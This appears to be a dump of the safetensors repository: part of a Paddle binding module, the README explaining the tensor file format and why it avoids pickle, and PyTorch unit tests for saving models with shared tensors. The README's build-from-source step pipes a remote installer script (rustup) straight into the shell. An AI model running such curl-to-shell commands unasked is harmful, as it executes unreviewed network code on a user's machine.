206 | paddle.int16: np.int16,
207 | paddle.uint8: np.uint8,
208 | paddle.int8: np.int8,
209 | paddle.bool: bool,
210 | paddle.float64: np.float64,
211 | # XXX: This is ok because both have the same width and byteswap is a no-op anyway
212 | paddle.float8_e4m3fn: np.uint8,
213 | paddle.float8_e5m2: np.uint8,
214 | }
215 |
216 |
217 | def _getdtype(dtype_str: str) -> paddle.dtype:
218 | return _TYPES[dtype_str]
219 |
220 |
221 | def _view2paddle(safeview, device) -> Dict[str, paddle.Tensor]:
222 | result = {}
223 | for k, v in safeview:
224 | dtype = _getdtype(v["dtype"])
225 | if len(v["data"]) == 0:
226 | # Workaround because frombuffer doesn't accept zero-size tensors
227 | assert any(x == 0 for x in v["shape"])
228 | arr = paddle.empty(v["shape"], dtype=dtype)
229 | else:
230 | arr = paddle.base.core.frombuffer(v["data"], dtype).reshape(v["shape"])
231 | if device != "cpu":
232 | arr = arr.to(device)
233 | if sys.byteorder == "big":
234 | arr = paddle.to_tensor(arr.numpy().byteswap(inplace=False), place=device)
235 | result[k] = arr
236 |
237 | return result
238 |
239 |
240 | def _to_ndarray(tensor: paddle.Tensor, name: str):
241 | if not tensor.is_contiguous():
242 | raise ValueError(
243 | f"You are trying to save a non contiguous tensor: `{name}` which is not allowed. It either means you"
244 | " are trying to save tensors which are reference of each other in which case it's recommended to save"
245 | " only the full tensors, and reslice at load time, or simply call `.contiguous()` on your tensor to"
246 | " pack it before saving."
247 | )
248 | if not tensor.place.is_cpu_place():
249 | # Moving tensor to cpu before saving
250 | tensor = tensor.cpu()
251 |
252 | import ctypes
253 |
254 | # When shape is empty (scalar), np.prod returns a float
255 |     # we need an int for the following calculations
256 | length = int(np.prod(tensor.shape).item())
257 | bytes_per_item = _SIZE[tensor.dtype]
258 |
259 | total_bytes = length * bytes_per_item
260 |
261 | ptr = tensor.data_ptr()
262 |     if ptr == 0:
263 |         # XXX: the second return value is bogus; we don't really care about
264 |         # returning a real tensor reference here since there is no data
265 |         return np.empty(0), 0
266 | newptr = ctypes.cast(ptr, ctypes.POINTER(ctypes.c_ubyte))
267 | data = np.ctypeslib.as_array(newptr, (total_bytes,)) # no internal copy
268 | if sys.byteorder == "big":
269 | npdtype = NPDTYPES[tensor.dtype]
270 | # Not in place as that would potentially modify a live running model
271 | data = data.view(npdtype).byteswap(inplace=False)
272 | return data, tensor
273 |
274 |
275 | def _flatten(
276 | tensors: Dict[str, paddle.Tensor], keep_alive_buffer: List
277 | ) -> Dict[str, Dict[str, Any]]:
278 | if not isinstance(tensors, dict):
279 | raise ValueError(
280 | f"Expected a dict of [str, paddle.Tensor] but received {type(tensors)}"
281 | )
282 |
283 | for k, v in tensors.items():
284 | if not isinstance(v, paddle.Tensor):
285 | raise ValueError(
286 | f"Key `{k}` is invalid, expected paddle.Tensor but received {type(v)}"
287 | )
288 |
289 | flattened = {}
290 | for k, v in tensors.items():
291 | arr, tensor_ref = _to_ndarray(v, k)
292 | keep_alive_buffer.append((arr, tensor_ref))
293 | flattened[k] = {
294 | "dtype": str(v.dtype).split(".")[-1],
295 | "shape": v.shape,
296 | "data_ptr": arr.ctypes.data,
297 | "data_len": arr.nbytes,
298 | }
299 | return flattened
300 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
11 | Python
12 | [PyPI](https://pypi.org/pypi/safetensors/)
13 | [Documentation](https://huggingface.co/docs/safetensors/index)
14 | [Codecov](https://codecov.io/gh/huggingface/safetensors)
15 | [Downloads](https://pepy.tech/project/safetensors)
16 |
17 | Rust
18 | [Crates.io](https://crates.io/crates/safetensors)
19 | [Documentation](https://docs.rs/safetensors/)
20 | [Codecov](https://codecov.io/gh/huggingface/safetensors)
21 | [Dependency status](https://deps.rs/repo/github/huggingface/safetensors?path=safetensors)
22 |
23 | # safetensors
24 |
25 | ## Safetensors
26 |
27 | This repository implements a new, simple format for storing tensors
28 | safely (as opposed to pickle) while remaining fast (zero-copy).
29 |
30 | ### Installation
31 | #### Pip
32 |
33 | You can install safetensors via the pip manager:
34 |
35 | ```bash
36 | pip install safetensors
37 | ```
38 |
39 | #### From source
40 |
41 | To build from source, you need Rust:
42 |
43 | ```bash
44 | # Install Rust
45 | curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
46 | # Make sure it's up to date and using stable channel
47 | rustup update
48 | git clone https://github.com/huggingface/safetensors
49 | cd safetensors/bindings/python
50 | pip install setuptools_rust
51 | pip install -e .
52 | ```
53 |
54 | ### Getting started
55 |
56 | ```python
57 | import torch
58 | from safetensors import safe_open
59 | from safetensors.torch import save_file
60 |
61 | tensors = {
62 | "weight1": torch.zeros((1024, 1024)),
63 | "weight2": torch.zeros((1024, 1024))
64 | }
65 | save_file(tensors, "model.safetensors")
66 |
67 | tensors = {}
68 | with safe_open("model.safetensors", framework="pt", device="cpu") as f:
69 | for key in f.keys():
70 | tensors[key] = f.get_tensor(key)
71 | ```
72 |
73 | [Python documentation](https://huggingface.co/docs/safetensors/index)
74 |
75 |
76 | ### Format
77 |
78 | - 8 bytes: `N`, an unsigned little-endian 64-bit integer, containing the size of the header
79 | - N bytes: a JSON UTF-8 string representing the header.
80 | - The header data MUST begin with a `{` character (0x7B).
81 | - The header data MAY be trailing padded with whitespace (0x20).
82 | - The header is a dict like `{"TENSOR_NAME": {"dtype": "F16", "shape": [1, 16, 256], "data_offsets": [BEGIN, END]}, "NEXT_TENSOR_NAME": {...}, ...}`,
83 | - `data_offsets` point to the tensor data relative to the beginning of the byte buffer (i.e. not an absolute position in the file),
84 | with `BEGIN` as the starting offset and `END` as the one-past offset (so total tensor byte size = `END - BEGIN`).
85 |   - A special key `__metadata__` is allowed; it contains a free-form string-to-string map. Arbitrary JSON is not allowed: all values must be strings.
86 | - Rest of the file: byte-buffer.
87 |
88 | Notes:
89 | - Duplicate keys are disallowed. Not all parsers may respect this.
90 | - In general, the subset of JSON accepted is implicitly decided by `serde_json` for
91 |   this library. Anything obscure (odd ways to represent integers, newlines and
92 |   escapes in UTF-8 strings) might be modified at a later time, and this would only
93 |   be done for safety concerns.
94 | - Tensor values are not validated; in particular, NaN and +/-Inf may
95 |   be present in the file.
96 | - Empty tensors (tensors with one dimension being 0) are allowed.
97 |   They store no data in the data buffer, yet retain a size in the header.
98 |   They don't bring much value but are accepted since they are valid tensors
99 |   from the perspective of traditional tensor libraries (torch, tensorflow, numpy, ...).
100 | - Rank-0 tensors (tensors with shape `[]`) are allowed; they are simply scalars.
101 | - The byte buffer needs to be entirely indexed, and cannot contain holes. This prevents
102 | the creation of polyglot files.
103 | - Endianness: Little-endian.
105 | - Order: 'C' or row-major.
106 | - Notes: Some dtypes smaller than 1 byte have appeared, which makes alignment tricky. Non-traditional APIs might be required for those.
107 |
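108 | To make the layout above concrete, here is a minimal sketch that reads just the header using only the Python standard library (the helper name is ours; error handling and the header-size limit are omitted):
109 |
110 | ```python
111 | import json
112 | import struct
113 |
114 | def read_safetensors_header(path):
115 |     with open(path, "rb") as f:
116 |         # 8 bytes: N, an unsigned little-endian 64-bit integer
117 |         (n,) = struct.unpack("<Q", f.read(8))
118 |         # N bytes: the JSON header (trailing 0x20 padding is valid JSON whitespace)
119 |         return json.loads(f.read(n))
120 |
121 | header = read_safetensors_header("model.safetensors")
122 | metadata = header.pop("__metadata__", {})  # optional free-form string map
123 | # remaining entries: {"TENSOR_NAME": {"dtype", "shape", "data_offsets"}, ...}
124 | ```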
108 |
109 | ### Yet another format?
110 |
111 | The main rationale for this crate is to remove the need for
112 | `pickle`, which `PyTorch` uses by default.
113 | There are other formats out there, both machine-learning specific and more
114 | general ones.
115 |
116 |
117 | Let's take a look at alternatives and why this format is deemed interesting.
118 | This is my very personal and probably biased view:
119 |
120 | | Format | Safe | Zero-copy | Lazy loading | No file size limit | Layout control | Flexibility | Bfloat16/Fp8 |
121 | | ----------------------- | --- | --- | --- | --- | --- | --- | --- |
122 | | pickle (PyTorch) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 |
123 | | H5 (Tensorflow) | 🗸 | ✗ | 🗸 | 🗸 | ~ | ~ | ✗ |
124 | | SavedModel (Tensorflow) | 🗸 | ✗ | ✗ | 🗸 | 🗸 | ✗ | 🗸 |
125 | | MsgPack (flax) | 🗸 | 🗸 | ✗ | 🗸 | ✗ | ✗ | 🗸 |
126 | | Protobuf (ONNX) | 🗸 | ✗ | ✗ | ✗ | ✗ | ✗ | 🗸 |
127 | | Cap'n'Proto | 🗸 | 🗸 | ~ | 🗸 | 🗸 | ~ | ✗ |
128 | | Arrow | ? | ? | ? | ? | ? | ? | ✗ |
129 | | Numpy (npy,npz) | 🗸 | ? | ? | ✗ | 🗸 | ✗ | ✗ |
130 | | pdparams (Paddle) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 |
131 | | SafeTensors | 🗸 | 🗸 | 🗸 | 🗸 | 🗸 | ✗ | 🗸 |
132 |
133 | - Safe: Can I use a file randomly downloaded and expect not to run arbitrary code?
134 | - Zero-copy: Does reading the file require more memory than the original file?
135 | - Lazy loading: Can I inspect the file without loading everything? And load only
136 |   some tensors in it without scanning the whole file (distributed setting)?
137 | - Layout control: Lazy loading is not necessarily enough: if the information about tensors is spread out in your file, then even though it is lazily accessible you might have to access most of your file to read the available tensors (incurring many disk -> RAM copies). Controlling the layout to keep fast access to single tensors is important.
138 | - No file size limit: Is there a limit to the file size?
139 | - Flexibility: Can I save custom code in the format and be able to use it later with zero extra code? (~ means we can store more than pure tensors, but no custom code)
140 | - Bfloat16/Fp8: Does the format support native bfloat16/fp8 (meaning no weird workarounds are
141 | necessary)? This is becoming increasingly important in the ML world.
142 |
143 |
144 | ### Main objections
145 |
146 | - Pickle: Unsafe, runs arbitrary code
147 | - H5: Apparently now discouraged for TF/Keras. Seems like a great fit otherwise actually. Some classic use-after-free issues have been reported. On a very different level than pickle security-wise. Also ~210k lines of code vs ~400 lines for this lib currently.
148 | - SavedModel: Tensorflow specific (it contains TF graph information).
149 | - MsgPack: No layout control to enable lazy loading (important for loading specific parts in distributed setting)
150 | - Protobuf: Hard 2GB max file size limit
151 | - Cap'n'proto: Float16 support is not present [link](https://capnproto.org/language.html#built-in-types) so using a manual wrapper over a byte-buffer would be necessary. Layout control seems possible but not trivial as buffers have limitations [link](https://stackoverflow.com/questions/48458839/capnproto-maximum-filesize).
152 | - Numpy (npz): No `bfloat16` support. Vulnerable to zip bombs (DOS). Not zero-copy.
153 | - Arrow: No `bfloat16` support.
154 |
155 | ### Notes
156 |
157 | - Zero-copy: No format is really zero-copy in ML: the data needs to go from disk to RAM/GPU RAM (and that takes time). On CPU, if the file is already in cache, it can
158 |   truly be zero-copy, whereas on GPU there is no such disk cache, so a copy is always required,
159 |   but you can avoid allocating all the tensors on CPU at any given point.
160 |   SafeTensors is not zero-copy for the header. The choice of JSON is pretty arbitrary, but deserializing it takes far less time than loading the actual tensor data and it stays human-readable, so I went that way (the header is also tiny compared to the tensor data).
161 |
162 | - Endianness: Little-endian. This can be modified later, but it feels really unnecessary at the
163 | moment.
164 | - Order: 'C' or row-major. This seems to have won. We can add that information later if needed.
165 | - Stride: No striding, all tensors need to be packed before being serialized. I have yet to see a case where it seems useful to have a strided tensor stored in serialized format.
166 | - Sub-1-byte dtypes: Dtypes can now be smaller than 1 byte, which makes alignment & addressing tricky. For now, the library simply errors out whenever an operation triggers a non-aligned read. A trickier API may be created later for those non-standard ops.
167 |
168 | ### Benefits
169 |
170 | Since we can invent a new format we can propose additional benefits:
171 |
172 | - Prevent DOS attacks: We can craft the format in such a way that it's almost
173 |   impossible to use malicious files to DOS attack a user. Currently, there's a
174 |   100MB limit on the size of the header to prevent parsing extremely large JSON.
175 |   Also, when reading the file, there's a guarantee that addresses in the file
176 |   do not overlap in any way, meaning that when you're loading a file you should never
177 |   exceed the size of the file in memory.
178 |
179 | - Faster load: PyTorch seems to be the fastest format to load among the major
180 |   ML formats. However, it does seem to have an extra copy on CPU, which we
181 |   can bypass in this lib by using `torch.UntypedStorage.from_file`.
182 |   Currently, CPU loading times are extremely fast with this lib compared to pickle.
183 |   GPU loading times are as fast as or faster than the PyTorch equivalent.
184 |   Loading first on CPU with memory mapping with torch, and then moving all tensors to GPU, seems
185 |   to be faster too somehow (pickle through torch shows similar behavior).
186 |
187 | - Lazy loading: in distributed (multi-node or multi-gpu) settings, it's nice to be able to
188 |   load only part of the tensors on each of the various processes (see the sketch below). For
189 |   [BLOOM](https://huggingface.co/bigscience/bloom), using this format brought loading
190 |   the model on 8 GPUs down from 10 minutes with regular PyTorch weights to 45 seconds.
191 |   This really speeds up feedback loops when developing on the model. For instance,
192 |   you don't need separate copies of the weights when changing the distribution
193 |   strategy (for instance Pipeline Parallelism vs Tensor Parallelism).
194 |
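195 | As a sketch of the lazy-loading pattern (the tensor name is illustrative; `rank`/`world_size` would come from your distributed setup, and we assume a 2-D `[vocab, hidden]` weight):
196 |
197 | ```python
198 | from safetensors import safe_open
199 |
200 | rank, world_size = 0, 8  # e.g. from torch.distributed
201 |
202 | with safe_open("model.safetensors", framework="pt", device="cpu") as f:
203 |     # Only the header is parsed here; tensor data is read on demand.
204 |     slice_ = f.get_slice("embedding")
205 |     _, hidden = slice_.get_shape()
206 |     block = hidden // world_size
207 |     # Each rank reads only its own column block from disk.
208 |     shard = slice_[:, rank * block : (rank + 1) * block]
209 | ```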
195 | License: Apache-2.0
196 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_pt_model.py:
--------------------------------------------------------------------------------
1 | import copy
2 | import unittest
3 |
4 | import torch
5 |
6 | from safetensors import safe_open
7 | from safetensors.torch import (
8 | _end_ptr,
9 | _find_shared_tensors,
10 | _is_complete,
11 | _remove_duplicate_names,
12 | load_model,
13 | save_file,
14 | save_model,
15 | )
16 |
17 |
18 | class OnesModel(torch.nn.Module):
19 | def __init__(self):
20 | super().__init__()
21 | self.a = torch.nn.Linear(4, 4)
22 | self.a.weight = torch.nn.Parameter(torch.ones((4, 4)))
23 | self.a.bias = torch.nn.Parameter(torch.ones((4,)))
24 | self.b = self.a
25 |
26 |
27 | class Model(torch.nn.Module):
28 | def __init__(self):
29 | super().__init__()
30 | self.a = torch.nn.Linear(100, 100)
31 | self.b = self.a
32 |
33 |
34 | class NonContiguousModel(torch.nn.Module):
35 | def __init__(self):
36 | super().__init__()
37 | self.a = torch.nn.Linear(100, 100)
38 | A = torch.zeros((100, 100))
39 | A = A.transpose(0, 1)
40 | self.a.weight = torch.nn.Parameter(A)
41 |
42 |
43 | class CopyModel(torch.nn.Module):
44 | def __init__(self):
45 | super().__init__()
46 | self.a = torch.nn.Linear(100, 100)
47 | self.b = copy.deepcopy(self.a)
48 |
49 |
50 | class NoSharedModel(torch.nn.Module):
51 | def __init__(self):
52 | super().__init__()
53 | self.a = torch.nn.Linear(100, 100)
54 | self.b = torch.nn.Linear(100, 100)
55 |
56 |
57 | class TorchModelTestCase(unittest.TestCase):
58 | def test_is_complete(self):
59 | A = torch.zeros((3, 3))
60 | self.assertTrue(_is_complete(A))
61 |
62 | B = A[:1, :]
63 | self.assertFalse(_is_complete(B))
64 |
65 | # Covers the whole storage but with holes
66 | C = A[::2, :]
67 | self.assertFalse(_is_complete(C))
68 |
69 | D = torch.zeros((2, 2), device=torch.device("meta"))
70 | self.assertTrue(_is_complete(D))
71 |
72 | def test_find_shared_tensors(self):
73 | A = torch.zeros((3, 3))
74 | B = A[:1, :]
75 |
76 | self.assertEqual(_find_shared_tensors({"A": A, "B": B}), [{"A", "B"}])
77 | self.assertEqual(_find_shared_tensors({"A": A}), [{"A"}])
78 | self.assertEqual(_find_shared_tensors({"B": B}), [{"B"}])
79 |
80 | C = torch.zeros((2, 2), device=torch.device("meta"))
81 | D = C[:1]
82 | # Meta device is not shared
83 | self.assertEqual(_find_shared_tensors({"C": C, "D": D}), [])
84 | self.assertEqual(_find_shared_tensors({"C": C}), [])
85 | self.assertEqual(_find_shared_tensors({"D": D}), [])
86 |
87 | def test_find_shared_non_shared_tensors(self):
88 | A = torch.zeros((4,))
89 | B = A[:2]
90 | C = A[2:]
91 | # Shared storage but do not overlap
92 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B"}, {"C"}])
93 |
94 | B = A[:2]
95 | C = A[1:]
96 | # Shared storage but *do* overlap
97 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B", "C"}])
98 |
99 | B = A[:2]
100 | C = A[2:]
101 | D = A[:1]
102 |         # B and D share storage and overlap; C is disjoint
103 | self.assertEqual(
104 | _find_shared_tensors({"B": B, "C": C, "D": D}), [{"B", "D"}, {"C"}]
105 | )
106 |
107 | def test_end_ptr(self):
108 | A = torch.zeros((4,))
109 | start = A.data_ptr()
110 | end = _end_ptr(A)
111 | self.assertEqual(end - start, 16)
112 | B = torch.zeros((16,))
113 | A = B[::4]
114 | start = A.data_ptr()
115 | end = _end_ptr(A)
116 |         # Jump 3 times 16 bytes (the stride of B)
117 | # Then add the size of the datapoint 4 bytes
118 | self.assertEqual(end - start, 16 * 3 + 4)
119 |
120 | # FLOAT16
121 | A = torch.zeros((4,), dtype=torch.float16)
122 | start = A.data_ptr()
123 | end = _end_ptr(A)
124 | self.assertEqual(end - start, 8)
125 | B = torch.zeros((16,), dtype=torch.float16)
126 | A = B[::4]
127 | start = A.data_ptr()
128 | end = _end_ptr(A)
129 | # Jump 3 times 8 bytes (the stride of B)
130 |         # Then add the size of the datapoint 2 bytes
131 | self.assertEqual(end - start, 8 * 3 + 2)
132 |
133 | def test_remove_duplicate_names(self):
134 | A = torch.zeros((3, 3))
135 | B = A[:1, :]
136 |
137 | self.assertEqual(_remove_duplicate_names({"A": A, "B": B}), {"A": ["B"]})
138 | self.assertEqual(
139 | _remove_duplicate_names({"A": A, "B": B, "C": A}), {"A": ["B", "C"]}
140 | )
141 | with self.assertRaises(RuntimeError):
142 | self.assertEqual(_remove_duplicate_names({"B": B}), [])
143 |
144 | def test_failure(self):
145 | model = Model()
146 | with self.assertRaises(RuntimeError):
147 | save_file(model.state_dict(), "tmp.safetensors")
148 |
149 | # def test_workaround_refuse(self):
150 | # model = Model()
151 | # A = torch.zeros((1000, 10))
152 | # a = A[:100, :]
153 | # model.a.weight = torch.nn.Parameter(a)
154 | # with self.assertRaises(RuntimeError) as ctx:
155 | # save_model(model, "tmp4.safetensors")
156 | # self.assertIn(".Refusing to save/load the model since you could be storing much more memory than needed.", str(ctx.exception))
157 |
158 | def test_save(self):
159 | # Just testing the actual saved file to make sure we're ok on big endian
160 | model = OnesModel()
161 | save_model(model, "tmp_ones.safetensors")
162 | with safe_open("tmp_ones.safetensors", framework="pt") as f:
163 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"})
164 |
165 | # 192 hardcoded to skip the header, metadata order is random.
166 | self.assertEqual(
167 | open("tmp_ones.safetensors", "rb").read()[192:],
168 | b"""\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?""",
169 | )
170 |
171 | model2 = OnesModel()
172 | load_model(model2, "tmp_ones.safetensors")
173 |
174 | state_dict = model.state_dict()
175 | for k, v in model2.state_dict().items():
176 | torch.testing.assert_close(v, state_dict[k])
177 |
178 | def test_workaround(self):
179 | model = Model()
180 | save_model(model, "tmp.safetensors")
181 | with safe_open("tmp.safetensors", framework="pt") as f:
182 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"})
183 |
184 | model2 = Model()
185 | load_model(model2, "tmp.safetensors")
186 |
187 | state_dict = model.state_dict()
188 | for k, v in model2.state_dict().items():
189 | torch.testing.assert_close(v, state_dict[k])
190 |
191 | def test_workaround_works_with_different_on_file_names(self):
192 | model = Model()
193 | state_dict = model.state_dict()
194 | state_dict.pop("a.weight")
195 | state_dict.pop("a.bias")
196 | save_file(state_dict, "tmp.safetensors")
197 |
198 | model2 = Model()
199 | load_model(model2, "tmp.safetensors")
200 |
201 | state_dict = model.state_dict()
202 | for k, v in model2.state_dict().items():
203 | torch.testing.assert_close(v, state_dict[k])
204 |
205 | def test_workaround_non_contiguous(self):
206 | model = NonContiguousModel()
207 |
208 | with self.assertRaises(ValueError) as ctx:
209 | save_model(model, "tmp_c.safetensors", force_contiguous=False)
210 | self.assertIn("use save_model(..., force_contiguous=True)", str(ctx.exception))
211 | save_model(model, "tmp_c.safetensors", force_contiguous=True)
212 |
213 | model2 = NonContiguousModel()
214 | load_model(model2, "tmp_c.safetensors")
215 |
216 | state_dict = model.state_dict()
217 | for k, v in model2.state_dict().items():
218 | torch.testing.assert_close(v, state_dict[k])
219 |
220 | def test_workaround_copy(self):
221 | model = CopyModel()
222 | self.assertEqual(
223 | _find_shared_tensors(model.state_dict()),
224 | [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}],
225 | )
226 | save_model(model, "tmp.safetensors")
227 |
228 | model2 = CopyModel()
229 | load_model(model2, "tmp.safetensors")
230 |
231 | state_dict = model.state_dict()
232 | for k, v in model2.state_dict().items():
233 | torch.testing.assert_close(v, state_dict[k])
234 |
235 | def test_difference_with_torch(self):
236 | model = Model()
237 | torch.save(model.state_dict(), "tmp2.bin")
238 |
239 | model2 = NoSharedModel()
240 |         # This passes on torch.
241 |         # The tensors are shared on disk, but they are *not* shared within the model.
242 |         # The model happily loads the tensors, and ends up *not* sharing them,
243 |         # by doing copies
244 | self.assertEqual(
245 | _find_shared_tensors(model2.state_dict()),
246 | [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}],
247 | )
248 | model2.load_state_dict(torch.load("tmp2.bin"))
249 | self.assertEqual(
250 | _find_shared_tensors(model2.state_dict()),
251 | [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}],
252 | )
253 |
254 | # However safetensors cannot save those, so we cannot
255 | # reload the saved file with the different model
256 | save_model(model, "tmp2.safetensors")
257 | with self.assertRaises(RuntimeError) as ctx:
258 | load_model(model2, "tmp2.safetensors")
259 | self.assertIn(
260 | """Missing key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception)
261 | )
262 |
263 | def test_difference_torch_odd(self):
264 | model = NoSharedModel()
265 | a = model.a.weight
266 | b = model.b.weight
267 | self.assertNotEqual(a.data_ptr(), b.data_ptr())
268 | torch.save(model.state_dict(), "tmp3.bin")
269 |
270 | model2 = Model()
271 | self.assertEqual(
272 | _find_shared_tensors(model2.state_dict()),
273 | [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}],
274 | )
275 |         # Torch will assign either `b` or `a` to the shared tensor in `model2`
276 | model2.load_state_dict(torch.load("tmp3.bin"))
277 |
278 | # XXX: model2 uses only the B weight not the A weight anymore.
279 | self.assertFalse(torch.allclose(model2.a.weight, model.a.weight))
280 | torch.testing.assert_close(model2.a.weight, model.b.weight)
281 | self.assertEqual(
282 | _find_shared_tensors(model2.state_dict()),
283 | [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}],
284 | )
285 |
286 | # Everything is saved as-is
287 | save_model(model, "tmp3.safetensors")
288 | # safetensors will yell that there were 2 tensors on disk, while
289 |         # the model expects only 1 tensor since both are shared.
290 | with self.assertRaises(RuntimeError) as ctx:
291 | load_model(model2, "tmp3.safetensors")
292 |         # Safetensors properly warns the user that some keys are unexpected.
293 | self.assertIn(
294 | """Unexpected key(s) in state_dict: "b.bias", "b.weight""",
295 | str(ctx.exception),
296 | )
297 |
--------------------------------------------------------------------------------